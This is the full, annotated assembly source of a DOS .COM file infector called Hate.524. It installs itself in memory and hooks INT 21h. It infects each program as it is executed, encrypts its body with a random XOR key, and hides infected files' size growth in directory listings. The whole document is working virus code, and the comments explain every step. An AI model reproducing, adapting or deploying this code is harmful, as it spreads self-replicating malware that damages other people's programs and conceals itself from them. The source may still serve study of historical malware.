; Hate.524 (named by Moi because of Internal Text and Size)
; Uninteresting Encrypted COM Infector
; Source code compliments of PakiLad
p386n                                   ; TASM: accept 80386 instructions (non-privileged); the handler below uses pusha/popa
seg000 segment byte public 'CODE' use16 ; one 16-bit segment holds both code and data (tiny/COM layout)
assume cs:seg000
org 100h                                ; COM load offset: entry at CS:100h, PSP occupies 0-0FFh
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
;-----------------------------------------------------------------------
; start -- entry point of an infected .COM host.
; On disk an infected file begins with the five bytes 24 21 E9 lo hi:
; 'and al,21h' (the InfMarker signature) followed by a near jump to the
; appended virus body (JMPInstruction/JMPOffset).  The host's own first
; five bytes are kept in OrgByte1..OrgByte3 and restored by RestoreCOM.
; Register state at entry: whatever DOS leaves in a freshly loaded .COM.
;-----------------------------------------------------------------------
start proc near
        and     al, 21h                 ; 24 21 -- doubles as the on-disk infection marker (see InfMarker)
        mov     ax, 5800h
        int     21h                     ; Virus Installation Check
        cmp     ah, 58h                 ; Installed Already?  NewInt21 never answers AH=58h and stock DOS
                                        ; returns the allocation strategy in AX (AH=0), so this is expected to fall through
        jnz     InstallVirus            ; No? Then JMP.
        mov     ah, 4Ch
        int     21h                     ; Exit To DOS
InstallVirus:
        call    $+3                     ; 3-byte call to the next instruction: pushes the run-time address of Next,
                                        ; which Next pops to compute the load delta
start endp
;-----------------------------------------------------------------------
; Next -- main virus body (entered by the fall-through from start's call $+3).
; si = load delta: run-time offset of Next minus its assembled offset, so
;      every data reference is written Label[si].  It is 0 for the resident
;      copy and for a first-generation run.
; Flow: decrypt Crypted..Cryptor in place (if a key is set) -> ask the hook
;       whether it is resident (AH=14h) -> either go resident (DoInstall)
;       or give control back to the host (RestoreCOM).
;-----------------------------------------------------------------------
Next proc near
        pop     si
        sub     si, offset Next         ; si = delta (where we were loaded vs. where we were assembled)
        mov     dl, Cryptor[si]         ; dl = single-byte XOR key stored at the end of the body
        cmp     dl, 0
        jz      Crypted                 ; key 0: body is in the clear (first generation, or a 0 read from port 40h)
        mov     cx, VirusSize           ; number of bytes between Crypted and Cryptor
        lea     di, Crypted[si]
DecryptLoop:                            ; in-place XOR of the body with the key byte
        mov     al, [di]
        xor     al, dl
        mov     [di], al
        inc     di
        loop    DecryptLoop
Crypted:                                ; everything from here to Cryptor is stored XORed in the host file
        mov     ah, 14h
        int     21h                     ; Install Check
        cmp     ah, 6                   ; Installed?   (NewInt21 answers AH=14h with AH=6)
        jz      RestoreCOM              ; Yes? Then JMP.
        jmp     short DoInstall
RestoreCOM:
        push    cs
        pop     ds                      ; ds = host segment (DoInstall arrives here with ds = resident segment)
        mov     ax, OrgByte1[si]
        mov     word ptr start, ax      ; put the host's original five bytes back at 100h..104h
        mov     ax, OrgByte2[si]
        mov     word ptr ds:102h, ax
        mov     al, OrgByte3[si]
        mov     byte ptr ds:104h, al
        mov     ax, offset start
        push    ax
        retn                            ; Return to Original Program   (push/retn = jmp 100h)
DoInstall:
        mov     ah, 52h
        int     21h                     ; Get List Of Lists   (es:bx)
        mov     bx, es:[bx-2]           ; word just before the list = segment of the first MCB
FindLastMCB:                            ; walk the arena chain: next = this + size(es:3) + 1 paragraph
        mov     es, bx
        add     bx, es:3
        inc     bx
        cmp     byte ptr es:0, 'Z'      ; Last MCB?
        jnz     FindLastMCB             ; No? Then JMP.
        mov     ax, es                  ; ax = segment of the 'Z' block
        mov     es, bx
        cmp     byte ptr es:0, 'M'      ; More MCB To Follow?   (a second chain may start right after 'Z')
        jz      GotMoreMCB              ; Yes? Then JMP.
        mov     es, ax                  ; ES points to MCB
        jmp     short GotMemory
GotMoreMCB:                             ; same walk over the second chain; es ends on its last block
        mov     es, bx
        add     bx, es:3
        inc     bx
        cmp     byte ptr es:0, 'M'
        jz      GotMoreMCB
GotMemory:                              ; es = last MCB; carve the virus's space off the top of that block
        mov     bx, es:3                ; bx = block size in paragraphs
        mov     ax, 795
        mov     cl, 4
        shr     ax, cl                  ; 795 >> 4 = 49 paragraphs (784 bytes; TotalSize+100h has to fit)
        sub     bx, ax
        mov     es:3, bx                ; shrink the block in place -- no DOS allocation call, so no MCB is created for the copy
        mov     ax, es
        add     bx, ax                  ; bx = segment just above the shrunk block
        xor     di, di
        mov     es, bx                  ; es:di = destination, offset 0
        mov     cx, TotalSize+100h      ; copy the 100h bytes below start as well so the copy keeps its org 100h layout
        push    si
        rep     movsb                   ; Copy Virus Into Memory   (ds:si = cs:delta -> es:0, so start lands at es:100h)
        pop     si
        push    es
        pop     ds                      ; ds = resident copy; the two stores below patch the resident image, not this one
        mov     ax, 3521h
        int     21h                     ; Get Int 21h Vectors   (es:bx)
        mov     Int21Ofs, bx            ; saved into the far-jump operand used by DoOriginalFunc and CallInt21
        mov     Int21Seg, es
        mov     ah, 25h
        mov     dx, offset NewInt21     ; ds:dx = NewInt21 inside the resident copy
        int     21h                     ; Set New Int 21h Vectors
        jmp     RestoreCOM              ; hand control to the host; si still holds the delta
Next endp
;-----------------------------------------------------------------------
; NewInt21 -- resident INT 21h handler (not a proc; reached via the vector).
; Dispatch on AH:
;   14h      -> installation check: answer with AH=6 (see Crypted in Next)
;   4Bh      -> InfectFile: ds:dx names the program about to be executed
;   11h/12h  -> FindFileFCB: let DOS do the search, then subtract TotalSize
;               from the reported size when the entry carries the marker
;   other    -> DoOriginalFunc: far jump to the saved original vector
; Everything else is passed through to the original handler unchanged.
;-----------------------------------------------------------------------
NewInt21:                               ; Install Check?
        cmp     ah, 14h
        jnz     CheckExecute            ; No? Then JMP.
        mov     ah, 6                   ; I'm Here!
        iret
CheckExecute:                           ; Set Execution State?
        cmp     ah, 4Bh                 ; DOS EXEC; the AL subfunction is not examined
        jnz     CheckFCBFind            ; No? Then JMP.
        jmp     short InfectFile
CheckFCBFind:                           ; Find First File (FCB)?
        cmp     ah, 11h
        jz      FindFileFCB             ; Yes? Then JMP.
        cmp     ah, 12h                 ; Find Next File (FCB)?
        jnz     DoOriginalFunc          ; No? Then JMP.
FindFileFCB:
        call    CallInt21               ; run the real search first
        pushf                           ; keep DOS's result flags and registers intact around the patch
        pusha
        push    es
        cmp     al, 0                   ; None found?
        jnz     NoFilesFound            ; No? Then JMP.
        mov     ah, 2Fh
        call    CallInt21               ; Get DTA Segment/Offset   (es:bx)
        cmp     byte ptr es:[bx], 0FFh  ; Extended FCB?
        jnz     NotExtFCB               ; No? Then JMP.
        add     bx, 7                   ; skip the 7-byte extended-FCB prefix
NotExtFCB:
        mov     al, es:[bx+17h]         ; low byte of the directory entry's time field
        and     al, 1Fh                 ; seconds/2 field
        cmp     al, 1Fh                 ; Infected Already?   (seconds field 1Fh = 62 s is the marker set in NoSigFound)
        jnz     NoFilesFound            ; No? Then JMP.
        sub     word ptr es:[bx+1Dh], TotalSize ; Fix FileSize   -- low word only; listings then show the pre-infection size
NoFilesFound:
        pop     es
        popa
        popf
        iret
DoOriginalFunc:
        jmp     short $+2               ; jump to the next instruction, i.e. into the far jump assembled from the bytes below
JMPFar21 db 0EAh                        ; opcode of JMP FAR; operand Int21Ofs:Int21Seg is filled in by DoInstall
Int21Ofs dw 0
Int21Seg dw 0
InfectFile:                             ; entry: ds:dx = path of the program being EXECed
        pusha
        push    es
        push    ds
        mov     ax, 3D02h
        call    CallInt21               ; Open File   (read/write; ax = handle on success)
        jnb     FileOpened              ; No problems? Then JMP.
        jmp     CloseFile               ; open failed; CloseFile still issues AH=3Eh, with bx not holding a handle
FileOpened:
        xchg    ax, bx                  ; bx = file handle
        push    cs
        pop     ds                      ; DS = CS   (resident segment; data labels need no delta here)
        mov     ah, 3Fh
        mov     cx, 5
        mov     dx, offset OrgByte1
        call    CallInt21               ; Read In 5 Bytes   -> OrgByte1/OrgByte2/OrgByte3, later written back by RestoreCOM
        mov     ax, OrgByte1            ; al, ah = first two bytes of the file
        add     ah, al
        cmp     ah, 0A7h                ; Infected Already?   (a different two-byte signature sum; not this virus's own)
        jnz     NotBad1                 ; No? Then JMP.
        jmp     CloseFile
NotBad1:                                ; Infected Already?
        cmp     ah, 45h                 ; 24h+21h: file already starts with the InfMarker bytes
        jnz     NoSigFound              ; No? Then JMP.
        jmp     CloseFile
NoSigFound:
        mov     ax, 5700h
        call    CallInt21               ; Get File Date/Time   (cx = time, dx = date)
        push    cx
        push    dx                      ; kept so the stamp can be put back after writing
        and     cx, 1Fh
        cmp     cx, 1Fh                 ; Infected Already?   (seconds field already 1Fh)
        jnz     MovePtrEnd              ; No? Then JMP.
        pop     dx
        pop     cx
        jmp     short CloseFile
MovePtrEnd:
        mov     ax, 4202h
        xor     cx, cx
        cwd                             ; cx:dx = 0, i.e. seek to end
        call    CallInt21               ; Move Pointer to End of File   (dx:ax = file size; only ax is used)
        sub     ax, 3                   ; Calculate JMP Offset   (rel16 from 105h lands at size+102h, the 'mov ax,5800h' of the appended copy)
        mov     JMPOffset, ax
        mov     ah, 40h
        mov     cx, CryptSize           ; start..Crypted: the decryptor stub, written in the clear
        mov     dx, offset start
        call    CallInt21               ; Write Crypt Routine to File
        mov     cx, VirusSize           ; Crypted..Cryptor: the part that gets XORed
        mov     si, offset Crypted
        mov     di, offset EndOfVirus
        mov     ax, 8F20h
        push    es
        push    ax
        pop     es                      ; es = 8F20h, a fixed absolute segment used as scratch buffer; nothing checks that it is free
        assume  es:nothing
        in      al, 40h                 ; Get Random Number   (PIT channel 0 counter, low byte)
        xchg    al, dl                  ; dl = new XOR key
        mov     Cryptor, dl             ; store it in the resident image so the extra byte copied below carries the key
EncryptVirus:                           ; XORed copy of Crypted..Cryptor -> 8F20h:EndOfVirus
        mov     al, [si]
        xor     al, dl
        mov     es:[di], al
        inc     si
        inc     di
        loop    EncryptVirus
        mov     cx, 1
EncryptSecond:                          ; one more byte, not XORed: the key byte (Cryptor) itself
        mov     al, [si]
        mov     es:[di], al
        inc     si
        inc     di
        loop    EncryptSecond
        pop     es
        assume  es:nothing
        push    ds
        mov     ax, 8F20h
        push    ax
        pop     ds                      ; ds = scratch segment for the write
        assume  ds:nothing
        mov     ah, 40h
        mov     cx, VirusSize2          ; Crypted..EndOfVirus = VirusSize + the key byte
        mov     dx, offset EndOfVirus
        call    CallInt21               ; Write Encrypted Virus To File
        pop     ds
        assume  ds:seg000
        mov     ax, 4200h
        xor     cx, cx
        cwd
        call    CallInt21               ; Move Pointer to Beginning
        mov     ah, 40h
        mov     cl, 5                   ; relies on ch still being 0 from the xor above
        mov     dx, offset InfMarker    ; 24 21 E9 lo hi
        call    CallInt21               ; Write JMP And Infection Marker
        pop     dx
        pop     cx
        or      cx, 1Fh                 ; seconds field = 1Fh marks the file (checked by NoSigFound and FindFileFCB)
        mov     ax, 5701h
        call    CallInt21               ; Fix File Date/Time   (original stamp apart from the seconds field)
CloseFile:
        mov     ah, 3Eh
        call    CallInt21               ; Close File   (bx = handle; on the open-failure path bx is whatever the caller passed)
        pop     ds
        pop     es
        popa
        jmp     near ptr JMPFar21       ; continue with the real EXEC through the saved vector
;-----------------------------------------------------------------------
; CallInt21 -- invoke the original INT 21h through the saved vector.
; pushf + far call reproduces what an INT does, so the callee's IRET
; returns here.  Goes around the virus's own NewInt21 (and, presumably,
; around anything hooked in front of it later).  Registers as for INT 21h.
;-----------------------------------------------------------------------
CallInt21 proc near
        pushf
        call    dword ptr cs:Int21Ofs   ; far pointer Int21Ofs:Int21Seg, filled in by DoInstall
        retn
CallInt21 endp
;-----------------------------------------------------------------------
; Data area.  Layout of an infected .COM, as InfectFile writes it:
;   [0..4]       24 21 E9 lo hi          (InfMarker, JMPInstruction, JMPOffset)
;   [5..size-1]  the original host minus its first five bytes
;   [size..]     start..Crypted in the clear, then Crypted..Cryptor XORed
;                with the key byte, then the key byte itself
; The directory time stamp's seconds field is set to 1Fh.  Both the leading
; 24 21 bytes and the 1Fh seconds value are what the code itself uses to
; recognise an already-infected file.
;-----------------------------------------------------------------------
OrgByte1 dw 2124h                       ; host's original bytes 0-1; the initial 24 21 / CD 20 / 00 =
OrgByte2 dw 20CDh                       ; 'and al,21h / int 20h / 0', so a first-generation run just terminates
OrgByte3 db 0                           ; host's original byte 4
InfMarker dw 2124h                      ; 'and al,21h' -- the five bytes from here to JMPOffset overwrite the host's header
JMPInstruction db 0E9h                  ; JMP rel16 opcode
JMPOffset dw 0                          ; filled in per file: size - 3 (see MovePtrEnd)
VirusName db 'THIS IS [HATE V1.0] VIRUS$' ; $-terminated text; not referenced by any code in this listing
Cryptor db 0                            ; XOR key; 0 in the assembled image, so the first generation runs undecrypted
EndOfVirus:
CryptSize equ Crypted - start           ; plaintext decryptor stub
VirusSize equ Cryptor - Crypted         ; XORed body
VirusSize2 equ $ - Crypted              ; XORed body + key byte
TotalSize equ $ - start                 ; growth of an infected file; also what FindFileFCB subtracts
seg000 ends
end start